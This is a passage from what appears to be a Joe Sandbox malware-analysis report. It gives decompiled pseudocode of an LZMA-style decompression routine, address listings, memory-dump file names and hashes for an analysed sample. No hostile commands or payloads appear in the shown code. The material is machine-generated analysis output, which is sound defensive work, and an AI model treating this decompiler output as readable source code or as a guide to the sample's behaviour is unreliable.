														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407033
0x00407033
0x00407033
0x00407033
0x00407039
0x0040703d
0x00407041
0x0040704b
0x00407059
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00407366
0x00407366
0x0040736a
0x00000000
0x00000000
0x0040736c
0x00407375
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738d
0x004073a6
0x004073a9
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x0040739e
0x004073a1
0x004073a1
0x004073c3
0x00407363
0x00407363
0x00407363
0x00407366
0x0040736a
0x00000000
0x00000000
0x00000000
0x004073c5
0x004073c5
0x0040733e
0x00407342
0x0040747a
0x0040747a
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x00407348
0x0040734e
0x00407355
0x0040735d
0x0040735d
0x00407360
0x00000000
0x00407360
0x004073ca
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00406a91
0x00000000
0x00406a98
0x00406a9c
0x00000000
0x00000000
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406afd
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x004073ed
0x00000000
0x004073ed
0x00406b47
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b71
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x004073fc
0x00000000
0x004073fc
0x00406bb7
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x0040746e
0x00000000
0x0040746e
0x004072c5
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x00000000
0x00406bfe
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00407450
0x00000000
0x00407450
0x0040712f
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407234
0x00407238
0x0040725a
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040723a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x0040732f
0x00407332
0x00407339
0x00000000
0x0040733c
0x004072f7
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e2
0x004073e5
0x004072e6
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x00000000
0x0040701c
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x0040733c
0x00000000
0x00000000
0x00000000
0x00407061
0x00407061
0x00407064
0x0040709a
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fa
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x00407366
0x0040732f

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407234() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
